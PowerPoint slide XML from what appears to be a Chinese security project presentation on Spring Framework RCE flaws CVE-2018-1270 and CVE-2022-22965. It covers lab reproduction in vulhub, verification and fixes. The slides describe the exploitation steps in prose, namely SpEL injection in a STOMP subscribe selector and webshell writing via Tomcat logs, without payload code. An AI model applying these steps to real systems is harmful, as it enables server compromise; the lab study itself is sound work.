                    <a:gd name="connsiteY10" fmla="*/ 36958 h 653420"/>
                    <a:gd name="connsiteX11" fmla="*/ 35765 w 415557"/>
                    <a:gd name="connsiteY11" fmla="*/ 111447 h 653420"/>
                    <a:gd name="connsiteX12" fmla="*/ 214282 w 415557"/>
                    <a:gd name="connsiteY12" fmla="*/ 577647 h 653420"/>
                    <a:gd name="connsiteX13" fmla="*/ 323448 w 415557"/>
                    <a:gd name="connsiteY13" fmla="*/ 616176 h 653420"/>
                    <a:gd name="connsiteX14" fmla="*/ 379957 w 415557"/>
                    <a:gd name="connsiteY14" fmla="*/ 514716 h 653420"/>
                    <a:gd name="connsiteX15" fmla="*/ 205292 w 415557"/>
                    <a:gd name="connsiteY15" fmla="*/ 57507 h 653420"/>
                    <a:gd name="connsiteX16" fmla="*/ 234831 w 415557"/>
                    <a:gd name="connsiteY16" fmla="*/ 45948 h 653420"/>
                    <a:gd name="connsiteX17" fmla="*/ 409495 w 415557"/>
                    <a:gd name="connsiteY17" fmla="*/ 501873 h 653420"/>
                    <a:gd name="connsiteX18" fmla="*/ 335006 w 415557"/>
                    <a:gd name="connsiteY18" fmla="*/ 644430 h 653420"/>
                    <a:gd name="connsiteX19" fmla="*/ 287487 w 415557"/>
                    <a:gd name="connsiteY19" fmla="*/ 653420 h 653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15557" h="653420">
                      <a:moveTo>
                        <a:pt x="287487" y="653420"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="241253" y="653420"/>
                        <a:pt x="200155" y="629019"/>
                        <a:pt x="184744" y="587921"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4942" y="123006"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-11754" y="78055"/>
                        <a:pt x="15216" y="26683"/>
                        <a:pt x="65304" y="7419"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89706" y="-1571"/>
                        <a:pt x="115392" y="-2855"/>
                        <a:pt x="137225" y="6135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="160342" y="15125"/>
                        <a:pt x="178322" y="31821"/>
                        <a:pt x="187312" y="53654"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="228410" y="162819"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="193734" y="162819"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157773" y="63928"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="152636" y="51085"/>
                        <a:pt x="141077" y="40811"/>
                        <a:pt x="126950" y="35674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="111539" y="30536"/>
                        <a:pt x="93558" y="30536"/>
                        <a:pt x="76863" y="36958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43471" y="49801"/>
                        <a:pt x="24206" y="83193"/>
                        <a:pt x="35765" y="111447"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="214282" y="577647"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="228410" y="616176"/>
                        <a:pt x="278497" y="632872"/>
                        <a:pt x="323448" y="616176"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="369682" y="598196"/>
                        <a:pt x="394084" y="553245"/>
                        <a:pt x="379957" y="514716"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="205292" y="57507"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="234831" y="45948"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409495" y="501873"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="430044" y="557098"/>
                        <a:pt x="396652" y="621313"/>
                        <a:pt x="335006" y="644430"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="318310" y="650852"/>
                        <a:pt x="302899" y="653420"/>
                        <a:pt x="287487" y="653420"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="007BD4"/>
                </a:solidFill>
                <a:ln w="12829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zh-CN" altLang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="文本框 50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6278" y="4215"/>
              <a:ext cx="6739" cy="25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400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     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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Spring Framework是美国Pivotal Software公司的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr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pc="20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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>  Spring Framework spring-messaging模块存在远程代码执行漏洞。攻击者可利用漏洞向代理生成消息，导致远程代码执行攻击。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="图片 51"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312545" y="3880485"/>
            <a:ext cx="9710420" cy="232473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623" y="313822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spring-messaging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞预警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(CVE-2018-1270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716405" y="1256030"/>
            <a:ext cx="1988185" cy="4921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+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>复现过程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853045" y="3285490"/>
            <a:ext cx="3438525" cy="276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 panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>    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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="任意多边形 37"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1691727"/>
            <a:ext cx="12192000" cy="2726456"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 19215"/>
              <a:gd name="connsiteY0" fmla="*/ 4051 h 4296"/>
              <a:gd name="connsiteX1" fmla="*/ 9492 w 19215"/>
              <a:gd name="connsiteY1" fmla="*/ 1712 h 4296"/>
              <a:gd name="connsiteX2" fmla="*/ 19215 w 19215"/>
              <a:gd name="connsiteY2" fmla="*/ 1306 h 4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215" h="4297">
                <a:moveTo>
                  <a:pt x="0" y="4051"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="524" y="4172"/>
                  <a:pt x="3790" y="5243"/>
                  <a:pt x="9492" y="1712"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15194" y="-1819"/>
                  <a:pt x="19077" y="1187"/>
                  <a:pt x="19215" y="1306"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="l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9" name="椭圆 38"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1996785" y="4248780"/>
            <a:ext cx="190351" cy="1903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0" name="圆角矩形 39"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716145" y="3646170"/>
            <a:ext cx="2693035" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="round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00000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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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接着发送subscribe消息，订阅某一个地址如/topic/greetings，并在selector字段中插入SpEL表达式。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4" name="椭圆 43"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5841247" y="2728507"/>
            <a:ext cx="190351" cy="1903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5" name="圆角矩形 44"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871809" y="5105995"/>
            <a:ext cx="2692836" cy="723969"/>
          </a:xfrm>
          <a:prstGeom prst="round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marL="0" algn="ctr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首先发送connect消息，建立与服务器的连接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" kern="1200"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46" name="椭圆 45"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9579111" y="1594014"/>
            <a:ext cx="190351" cy="1903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7" name="圆角矩形 46"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8453755" y="2377440"/>
            <a:ext cx="2693035" cy="1708150"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1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rgbClr val="000000"/>
              </a:solidFill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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>最后发送send消息，向/app/hello发送包含name字段的JSON数据，从而触发服务器向订阅地址发送消息、导致服务器执行插入的SpEL表达式。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN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 panose="020F0502020204030204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8" name="矩形 47"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871174" y="4595853"/>
            <a:ext cx="2440304" cy="329942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90099" tIns="46953" rIns="90099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连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="矩形 48"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839428" y="3629503"/>
            <a:ext cx="505700" cy="468264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90099" tIns="46953" rIns="90099" bIns="46953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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="矩形 49"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305725" y="3117458"/>
            <a:ext cx="1260760" cy="329942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90099" tIns="46953" rIns="90099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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>订阅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683889" y="2121287"/>
            <a:ext cx="505700" cy="468264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90099" tIns="46953" rIns="90099" bIns="46953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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9042955" y="1881444"/>
            <a:ext cx="1260759" cy="329942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90099" tIns="46953" rIns="90099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发送</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="矩形 52"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9420485" y="1028670"/>
            <a:ext cx="505699" cy="468264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90099" tIns="46953" rIns="90099" bIns="46953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03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623" y="313822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spring-messaging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞预警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(CVE-2018-1270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973580" y="975360"/>
            <a:ext cx="1988185" cy="4921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结果验证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733030" y="975360"/>
            <a:ext cx="1988185" cy="4921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漏洞修复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62025" y="3429000"/>
            <a:ext cx="3552825" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="168" name="组合 167" descr="7b0a202020202274657874626f78223a2022220a7d0a"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="855345" y="1662430"/>
            <a:ext cx="3837305" cy="1571625"/>
            <a:chOff x="5370" y="3510"/>
            <a:chExt cx="8461" cy="3780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="矩形 168"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5720" y="3832"/>
              <a:ext cx="7761" cy="3136"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F8F8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0" name="椭圆 169"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5370" y="3510"/>
              <a:ext cx="227" cy="227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1" name="直接连接符 170"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5596" y="3616"/>
              <a:ext cx="794" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
              <a:prstDash val="sysDash"/>
              <a:round/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任意多边形 171"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6390" y="3616"/>
              <a:ext cx="7275" cy="1372"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connisteX0" fmla="*/ 0 w 5389880"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 2423795"/>
                <a:gd name="connisteX1" fmla="*/ 5389880 w 5389880"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 2423795"/>
                <a:gd name="connisteX2" fmla="*/ 5389880 w 5389880"/>
                <a:gd name="connsiteY2" fmla="*/ 2423795 h 242379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5389880" h="2423795">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5389880" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5389880" y="2423795"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="25400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任意多边形 172"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5522" y="5696"/>
              <a:ext cx="7347" cy="1481"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connisteX0" fmla="*/ 0 w 5389880"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 2423795"/>
                <a:gd name="connisteX1" fmla="*/ 5389880 w 5389880"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 2423795"/>
                <a:gd name="connisteX2" fmla="*/ 5389880 w 5389880"/>
                <a:gd name="connsiteY2" fmla="*/ 2423795 h 242379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5389880" h="2423795">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5389880" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5389880" y="2423795"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="C0C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4" name="直接连接符 173"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12914" y="7177"/>
              <a:ext cx="763" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="C0C0C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椭圆 174"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13604" y="7063"/>
              <a:ext cx="227" cy="227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6" name="文本框 175"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6559" y="4369"/>
              <a:ext cx="6550" cy="22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zh-CN" altLang="en-US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Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>进入容器 docker compose exec spring bash ，可见 /tmp/success 已成功</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="180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  <a:sym typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>创建。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="汉仪晓波折纸体简" panose="00020600040101010101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10" name="圆角矩形 209"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5346876" y="2347735"/>
            <a:ext cx="2021018" cy="2742810"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9228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2700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圆角矩形 210"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7577963" y="2347735"/>
            <a:ext cx="2021018" cy="2742810"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9228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2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="accent2"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椭圆 211"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953409" y="2670099"/>
            <a:ext cx="808407" cy="80840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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="文本框 212"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608128" y="3855158"/>
            <a:ext cx="1498345" cy="69310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b="1" spc="3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升级版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="椭圆 213"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8183988" y="2670099"/>
            <a:ext cx="808407" cy="808407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100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="文本框 214"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7839216" y="3855158"/>
            <a:ext cx="1498345" cy="69310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b="1" spc="3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获取补丁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9808541" y="2347735"/>
            <a:ext cx="2021018" cy="2742810"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9228"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="38100" dir="2700000" algn="tl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7" name="椭圆 216"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10415075" y="2670099"/>
            <a:ext cx="808407" cy="808407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100000"/>
                </a:schemeClr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03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="文本框 217"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10070303" y="3855158"/>
            <a:ext cx="1498345" cy="69310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000" b="1" spc="3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输入验证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CED4A3E-057D-48F4-6444-414C76671339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="313822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Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1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远程代码执行漏洞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(CVE-2022-22965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Calibri" panose="020F0502020204030204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BFF59F-FB95-D173-3E3D-B949C54C9B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728345" y="1607185"/>
            <a:ext cx="8755380" cy="19234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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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Spring框架（Framework）是一个开源的轻量级J2EE应用程序开发框架，其历史漏洞修复代码存在缺陷，在 JDK 9 及以上版本环境下，远程攻击者可借助Tomcat中间件构造数据包修改日志文件，从而可在任意路径下写入Webshell等恶意文件，进而可执行任意代码控制服务器。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2B70F5-DA9F-375E-7072-616D54DA001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48543" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞介绍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49D2D9-A20A-657F-B71A-B5AA9EFC0AC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28345" y="3822700"/>
            <a:ext cx="8755380" cy="8540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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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首先使用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vulhub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靶场搭建环境，访问目标。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Calibri" panose="020F0502020204030204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C3D85F-7FBF-8D8C-DBE8-4E1B82FA635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75543" y="3288797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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现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78B0182-CAC2-FFB7-4830-FA01F1DD16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657" y="4348725"/>
            <a:ext cx="11364685" cy="181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9513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623" y="313822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Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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(CVE-2022-22965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)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8345" y="1607185"/>
            <a:ext cx="8755380" cy="7118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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>之后进行抓包，使用复现代码修改请求：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048543" y="1073282"/>
            <a:ext cx="8867273" cy="534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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现（续）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r="17088" b="33158"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048385" y="2012315"/>
            <a:ext cx="9603740" cy="41179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55158" y="332780"/>
            <a:ext cx="9882052" cy="501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665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7876" y="1428207"/>
            <a:ext cx="8207032" cy="3278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>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2135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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2135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项目任务概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2135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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2135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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2135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项目小组分工及安排</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2135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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2135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135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项目完成情况的思考与复盘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2135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defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2135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2135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14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项目任务改进措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="214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defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2135" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2135" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>团队能力、小组个人能力及价值观</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2135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情况概述</a:t>
            </a:r>
